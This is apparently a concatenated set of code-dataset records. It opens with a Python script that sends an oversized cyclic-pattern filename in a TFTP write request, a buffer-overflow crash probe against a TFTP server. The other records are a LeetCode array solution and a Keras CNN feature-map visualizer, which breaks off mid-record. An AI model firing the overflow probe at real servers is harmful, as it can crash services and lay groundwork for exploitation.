"step-1": "#!/usr/bin/python \nimport socket \nimport sys\n\nhost = '10.211.55.5' \nport = 69\ntry:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \nexcept:\n print \"socket() failed\" \n sys.exit(1)\nfilename = \"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9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\"\nmode = \"netascii\"\nbuf = \"\\x00\\x02\" + filename+ \"\\0\" + mode+ \"\\0\" \ns.sendto(buf, (host, port))",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
class Solution(object):
def findDisappearedNumbers(self, nums):
"""
:type nums: List[int]
:rtype: List[int]
"""
ns = [0]*len(nums)
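        # Approach 1: nums holds n values, each in [1, n]; mark each seen value in the
        # presence array ns and report every 1-based position that was never marked.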
for i in range(0, len(nums), 1):
ns[nums[i]-1] = 1
ret = []
for j in range(0, len(ns), 1):
if(ns[j] == 0): ret.append(j+1)
return ret
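# Alternative approach: reuse nums itself as the presence marker by negating the value at each
# seen index, which keeps the extra space at O(1).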
class Solution(object):
def findDisappearedNumbers(self, nums):
"""
:type nums: List[int]
:rtype: List[int]
"""
for i in range(0, len(nums), 1):
index = abs(nums[i]) - 1
nums[index] = - abs(nums[index])
return [i + 1 for i in range(0, len(nums), 1) if nums[i] > 0]
|
normal
|
{
"blob_id": "87504fb88cbbf810ad8bab08bc59284d2cf37cce",
"index": 850,
"step-1": "<mask token>\n\n\nclass Solution(object):\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution(object):\n\n def findDisappearedNumbers(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n for i in range(0, len(nums), 1):\n index = abs(nums[i]) - 1\n nums[index] = -abs(nums[index])\n return [(i + 1) for i in range(0, len(nums), 1) if nums[i] > 0]\n",
"step-3": "class Solution(object):\n <mask token>\n\n\nclass Solution(object):\n\n def findDisappearedNumbers(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n for i in range(0, len(nums), 1):\n index = abs(nums[i]) - 1\n nums[index] = -abs(nums[index])\n return [(i + 1) for i in range(0, len(nums), 1) if nums[i] > 0]\n",
"step-4": "class Solution(object):\n\n def findDisappearedNumbers(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n ns = [0] * len(nums)\n for i in range(0, len(nums), 1):\n ns[nums[i] - 1] = 1\n ret = []\n for j in range(0, len(ns), 1):\n if ns[j] == 0:\n ret.append(j + 1)\n return ret\n\n\nclass Solution(object):\n\n def findDisappearedNumbers(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n for i in range(0, len(nums), 1):\n index = abs(nums[i]) - 1\n nums[index] = -abs(nums[index])\n return [(i + 1) for i in range(0, len(nums), 1) if nums[i] > 0]\n",
"step-5": "class Solution(object):\n def findDisappearedNumbers(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n ns = [0]*len(nums)\n for i in range(0, len(nums), 1):\n ns[nums[i]-1] = 1\n \n ret = []\n for j in range(0, len(ns), 1):\n if(ns[j] == 0): ret.append(j+1)\n return ret\n\nclass Solution(object):\n def findDisappearedNumbers(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n for i in range(0, len(nums), 1):\n index = abs(nums[i]) - 1\n nums[index] = - abs(nums[index])\n\n return [i + 1 for i in range(0, len(nums), 1) if nums[i] > 0]",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import cv2
import numpy as np
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import SeparableConv2D, Conv2D, MaxPooling2D
from keras.layers import BatchNormalization, Activation, Dropout, Flatten, Dense
from keras import backend as K
# dimensions of images.
img_width, img_height = 64,64
train_data_dir = 'data/train'
validation_data_dir = 'data/test'
nb_train_samples = 25473
nb_validation_samples = 7000
epochs = 50
batch_size = 64
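# Note: the data directories and training hyperparameters above are declared but never used
# below -- this script only builds the model and visualizes feature maps for a single image.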
if K.image_data_format() == 'channels_first':
input_shape = (3, img_width, img_height)
else:
input_shape = (img_width, img_height, 3)
model = Sequential()
convout1 = Conv2D(32, kernel_size=6, strides=2, input_shape=input_shape)
model.add(convout1)
activ1 = Activation('relu')
model.add(activ1)
convout2 = Conv2D(64, kernel_size=5, strides=1)
model.add(convout2)
activ2 = Activation('relu')
model.add(activ2)
pool1 = MaxPooling2D(pool_size=(3, 3), strides=1)
model.add(pool1)
convout3 = Conv2D(128, kernel_size=4, strides=2)
model.add(convout3)
activ3 = Activation('relu')
model.add(activ3)
convout4 = Conv2D(128, kernel_size=3, strides=1)
model.add(convout4)
activ4 = Activation('relu')
model.add(activ4)
pool2 = MaxPooling2D(pool_size=2, strides=1)
model.add(pool2)
convout5 = Conv2D(256, kernel_size=3, strides=1)
model.add(convout5)
activ5 = Activation('relu')
model.add(activ5)
pool3 = MaxPooling2D(pool_size=2, strides=1)
model.add(pool3)
model.add(Flatten())
dense1 = Dense(256)
model.add(dense1)
activ6 = Activation('relu')
model.add(activ6)
batchn = BatchNormalization()
model.add(batchn)
dense2 = Dense(184)
model.add(dense2)
activ7 = Activation('softmax')
model.add(activ7)
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
img = cv2.imread('test.jpg')
img = cv2.resize(img, (64, 64))
img = np.expand_dims(img, axis=0)
classes = model.predict(img)
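# Note: the model is never trained in this script (no fit call), so this prediction and the
# feature maps visualized below come from randomly initialized weights.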
def layer_to_visualize(layer):
inputs = [K.learning_phase()] + model.inputs
_convout1_f = K.function(inputs, [layer.output])
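    # K.function compiles a backend function mapping (learning phase, model input) to this layer's output.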
def convout1_f(X):
# The [0] is to disable the training phase flag
return _convout1_f([0] + [X])
convolutions = convout1_f(img)
convolutions = np.squeeze(convolutions)
print ('Shape of conv:', convolutions.shape)
n = convolutions.shape[0]
n = int(np.ceil(np.sqrt(n)))
# Visualization of each filter of the layer
fig = plt.figure(figsize=(12,8))
for i in range(len(convolutions)):
ax = fig.add_subplot(n,n,i+1)
ax.imshow(convolutions[i], cmap='gray')
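    # With the non-interactive 'agg' backend selected above, the figure is only rendered in
    # memory; a plt.savefig(...) call would be needed here to write the visualization to disk.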
# Specify the layer you want to visualize
layer_to_visualize(convout1)
layer_to_visualize(activ1)
layer_to_visualize(convout2)
layer_to_visualize(activ2)
layer_to_visualize(pool1)
layer_to_visualize(convout3)
layer_to_visualize(activ3)
layer_to_visualize(convout4)
layer_to_visualize(activ4)
layer_to_visualize(pool2)
layer_to_visualize(convout5)
layer_to_visualize(activ5)
layer_to_visualize(pool3)
|
normal
|
{
"blob_id": "e47d6b5d46f2dd84569a2341178b2ea5e074603a",
"index": 7361,
"step-1": "<mask token>\n\n\ndef layer_to_visualize(layer):\n inputs = [K.learning_phase()] + model.inputs\n _convout1_f = K.function(inputs, [layer.output])\n\n def convout1_f(X):\n return _convout1_f([0] + [X])\n convolutions = convout1_f(img)\n convolutions = np.squeeze(convolutions)\n print('Shape of conv:', convolutions.shape)\n n = convolutions.shape[0]\n n = int(np.ceil(np.sqrt(n)))\n fig = plt.figure(figsize=(12, 8))\n for i in range(len(convolutions)):\n ax = fig.add_subplot(n, n, i + 1)\n ax.imshow(convolutions[i], cmap='gray')\n\n\n<mask token>\n",
"step-2": "<mask token>\nmatplotlib.use('agg')\n<mask token>\nif K.image_data_format() == 'channels_first':\n input_shape = 3, img_width, img_height\nelse:\n input_shape = img_width, img_height, 3\n<mask token>\nmodel.add(convout1)\n<mask token>\nmodel.add(activ1)\n<mask token>\nmodel.add(convout2)\n<mask token>\nmodel.add(activ2)\n<mask token>\nmodel.add(pool1)\n<mask token>\nmodel.add(convout3)\n<mask token>\nmodel.add(activ3)\n<mask token>\nmodel.add(convout4)\n<mask token>\nmodel.add(activ4)\n<mask token>\nmodel.add(pool2)\n<mask token>\nmodel.add(convout5)\n<mask token>\nmodel.add(activ5)\n<mask token>\nmodel.add(pool3)\nmodel.add(Flatten())\n<mask token>\nmodel.add(dense1)\n<mask token>\nmodel.add(activ6)\n<mask token>\nmodel.add(batchn)\n<mask token>\nmodel.add(dense2)\n<mask token>\nmodel.add(activ7)\nmodel.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics\n =['accuracy'])\n<mask token>\n\n\ndef layer_to_visualize(layer):\n inputs = [K.learning_phase()] + model.inputs\n _convout1_f = K.function(inputs, [layer.output])\n\n def convout1_f(X):\n return _convout1_f([0] + [X])\n convolutions = convout1_f(img)\n convolutions = np.squeeze(convolutions)\n print('Shape of conv:', convolutions.shape)\n n = convolutions.shape[0]\n n = int(np.ceil(np.sqrt(n)))\n fig = plt.figure(figsize=(12, 8))\n for i in range(len(convolutions)):\n ax = fig.add_subplot(n, n, i + 1)\n ax.imshow(convolutions[i], cmap='gray')\n\n\nlayer_to_visualize(convout1)\nlayer_to_visualize(activ1)\nlayer_to_visualize(convout2)\nlayer_to_visualize(activ2)\nlayer_to_visualize(pool1)\nlayer_to_visualize(convout3)\nlayer_to_visualize(activ3)\nlayer_to_visualize(convout4)\nlayer_to_visualize(activ4)\nlayer_to_visualize(pool2)\nlayer_to_visualize(convout5)\nlayer_to_visualize(activ5)\nlayer_to_visualize(pool3)\n",
"step-3": "<mask token>\nmatplotlib.use('agg')\n<mask token>\nimg_width, img_height = 64, 64\ntrain_data_dir = 'data/train'\nvalidation_data_dir = 'data/test'\nnb_train_samples = 25473\nnb_validation_samples = 7000\nepochs = 50\nbatch_size = 64\nif K.image_data_format() == 'channels_first':\n input_shape = 3, img_width, img_height\nelse:\n input_shape = img_width, img_height, 3\nmodel = Sequential()\nconvout1 = Conv2D(32, kernel_size=6, strides=2, input_shape=input_shape)\nmodel.add(convout1)\nactiv1 = Activation('relu')\nmodel.add(activ1)\nconvout2 = Conv2D(64, kernel_size=5, strides=1)\nmodel.add(convout2)\nactiv2 = Activation('relu')\nmodel.add(activ2)\npool1 = MaxPooling2D(pool_size=(3, 3), strides=1)\nmodel.add(pool1)\nconvout3 = Conv2D(128, kernel_size=4, strides=2)\nmodel.add(convout3)\nactiv3 = Activation('relu')\nmodel.add(activ3)\nconvout4 = Conv2D(128, kernel_size=3, strides=1)\nmodel.add(convout4)\nactiv4 = Activation('relu')\nmodel.add(activ4)\npool2 = MaxPooling2D(pool_size=2, strides=1)\nmodel.add(pool2)\nconvout5 = Conv2D(256, kernel_size=3, strides=1)\nmodel.add(convout5)\nactiv5 = Activation('relu')\nmodel.add(activ5)\npool3 = MaxPooling2D(pool_size=2, strides=1)\nmodel.add(pool3)\nmodel.add(Flatten())\ndense1 = Dense(256)\nmodel.add(dense1)\nactiv6 = Activation('relu')\nmodel.add(activ6)\nbatchn = BatchNormalization()\nmodel.add(batchn)\ndense2 = Dense(184)\nmodel.add(dense2)\nactiv7 = Activation('softmax')\nmodel.add(activ7)\nmodel.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics\n =['accuracy'])\nimg = cv2.imread('test.jpg')\nimg = cv2.resize(img, (64, 64))\nimg = np.expand_dims(img, axis=0)\nclasses = model.predict(img)\n\n\ndef layer_to_visualize(layer):\n inputs = [K.learning_phase()] + model.inputs\n _convout1_f = K.function(inputs, [layer.output])\n\n def convout1_f(X):\n return _convout1_f([0] + [X])\n convolutions = convout1_f(img)\n convolutions = np.squeeze(convolutions)\n print('Shape of conv:', convolutions.shape)\n n = convolutions.shape[0]\n n = int(np.ceil(np.sqrt(n)))\n fig = plt.figure(figsize=(12, 8))\n for i in range(len(convolutions)):\n ax = fig.add_subplot(n, n, i + 1)\n ax.imshow(convolutions[i], cmap='gray')\n\n\nlayer_to_visualize(convout1)\nlayer_to_visualize(activ1)\nlayer_to_visualize(convout2)\nlayer_to_visualize(activ2)\nlayer_to_visualize(pool1)\nlayer_to_visualize(convout3)\nlayer_to_visualize(activ3)\nlayer_to_visualize(convout4)\nlayer_to_visualize(activ4)\nlayer_to_visualize(pool2)\nlayer_to_visualize(convout5)\nlayer_to_visualize(activ5)\nlayer_to_visualize(pool3)\n",
"step-4": "import cv2\nimport numpy as np\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers import SeparableConv2D, Conv2D, MaxPooling2D\nfrom keras.layers import BatchNormalization, Activation, Dropout, Flatten, Dense\nfrom keras import backend as K\nimg_width, img_height = 64, 64\ntrain_data_dir = 'data/train'\nvalidation_data_dir = 'data/test'\nnb_train_samples = 25473\nnb_validation_samples = 7000\nepochs = 50\nbatch_size = 64\nif K.image_data_format() == 'channels_first':\n input_shape = 3, img_width, img_height\nelse:\n input_shape = img_width, img_height, 3\nmodel = Sequential()\nconvout1 = Conv2D(32, kernel_size=6, strides=2, input_shape=input_shape)\nmodel.add(convout1)\nactiv1 = Activation('relu')\nmodel.add(activ1)\nconvout2 = Conv2D(64, kernel_size=5, strides=1)\nmodel.add(convout2)\nactiv2 = Activation('relu')\nmodel.add(activ2)\npool1 = MaxPooling2D(pool_size=(3, 3), strides=1)\nmodel.add(pool1)\nconvout3 = Conv2D(128, kernel_size=4, strides=2)\nmodel.add(convout3)\nactiv3 = Activation('relu')\nmodel.add(activ3)\nconvout4 = Conv2D(128, kernel_size=3, strides=1)\nmodel.add(convout4)\nactiv4 = Activation('relu')\nmodel.add(activ4)\npool2 = MaxPooling2D(pool_size=2, strides=1)\nmodel.add(pool2)\nconvout5 = Conv2D(256, kernel_size=3, strides=1)\nmodel.add(convout5)\nactiv5 = Activation('relu')\nmodel.add(activ5)\npool3 = MaxPooling2D(pool_size=2, strides=1)\nmodel.add(pool3)\nmodel.add(Flatten())\ndense1 = Dense(256)\nmodel.add(dense1)\nactiv6 = Activation('relu')\nmodel.add(activ6)\nbatchn = BatchNormalization()\nmodel.add(batchn)\ndense2 = Dense(184)\nmodel.add(dense2)\nactiv7 = Activation('softmax')\nmodel.add(activ7)\nmodel.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics\n =['accuracy'])\nimg = cv2.imread('test.jpg')\nimg = cv2.resize(img, (64, 64))\nimg = np.expand_dims(img, axis=0)\nclasses = model.predict(img)\n\n\ndef layer_to_visualize(layer):\n inputs = [K.learning_phase()] + model.inputs\n _convout1_f = K.function(inputs, [layer.output])\n\n def convout1_f(X):\n return _convout1_f([0] + [X])\n convolutions = convout1_f(img)\n convolutions = np.squeeze(convolutions)\n print('Shape of conv:', convolutions.shape)\n n = convolutions.shape[0]\n n = int(np.ceil(np.sqrt(n)))\n fig = plt.figure(figsize=(12, 8))\n for i in range(len(convolutions)):\n ax = fig.add_subplot(n, n, i + 1)\n ax.imshow(convolutions[i], cmap='gray')\n\n\nlayer_to_visualize(convout1)\nlayer_to_visualize(activ1)\nlayer_to_visualize(convout2)\nlayer_to_visualize(activ2)\nlayer_to_visualize(pool1)\nlayer_to_visualize(convout3)\nlayer_to_visualize(activ3)\nlayer_to_visualize(convout4)\nlayer_to_visualize(activ4)\nlayer_to_visualize(pool2)\nlayer_to_visualize(convout5)\nlayer_to_visualize(activ5)\nlayer_to_visualize(pool3)\n",
"step-5": "import cv2\nimport numpy as np\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers import SeparableConv2D, Conv2D, MaxPooling2D\nfrom keras.layers import BatchNormalization, Activation, Dropout, Flatten, Dense\nfrom keras import backend as K\n\n# dimensions of images.\nimg_width, img_height = 64,64 \n\ntrain_data_dir = 'data/train'\nvalidation_data_dir = 'data/test'\nnb_train_samples = 25473\nnb_validation_samples = 7000\nepochs = 50\nbatch_size = 64\n\nif K.image_data_format() == 'channels_first':\n input_shape = (3, img_width, img_height)\nelse:\n input_shape = (img_width, img_height, 3)\nmodel = Sequential()\nconvout1 = Conv2D(32, kernel_size=6, strides=2, input_shape=input_shape)\nmodel.add(convout1)\nactiv1 = Activation('relu')\nmodel.add(activ1)\nconvout2 = Conv2D(64, kernel_size=5, strides=1)\nmodel.add(convout2)\nactiv2 = Activation('relu')\nmodel.add(activ2)\npool1 = MaxPooling2D(pool_size=(3, 3), strides=1)\nmodel.add(pool1)\n\nconvout3 = Conv2D(128, kernel_size=4, strides=2)\nmodel.add(convout3)\nactiv3 = Activation('relu')\nmodel.add(activ3)\nconvout4 = Conv2D(128, kernel_size=3, strides=1)\nmodel.add(convout4)\nactiv4 = Activation('relu')\nmodel.add(activ4)\npool2 = MaxPooling2D(pool_size=2, strides=1)\nmodel.add(pool2)\n\nconvout5 = Conv2D(256, kernel_size=3, strides=1)\nmodel.add(convout5)\nactiv5 = Activation('relu')\nmodel.add(activ5)\npool3 = MaxPooling2D(pool_size=2, strides=1)\nmodel.add(pool3)\n\nmodel.add(Flatten())\ndense1 = Dense(256)\nmodel.add(dense1)\nactiv6 = Activation('relu')\nmodel.add(activ6)\nbatchn = BatchNormalization()\nmodel.add(batchn)\ndense2 = Dense(184)\nmodel.add(dense2)\nactiv7 = 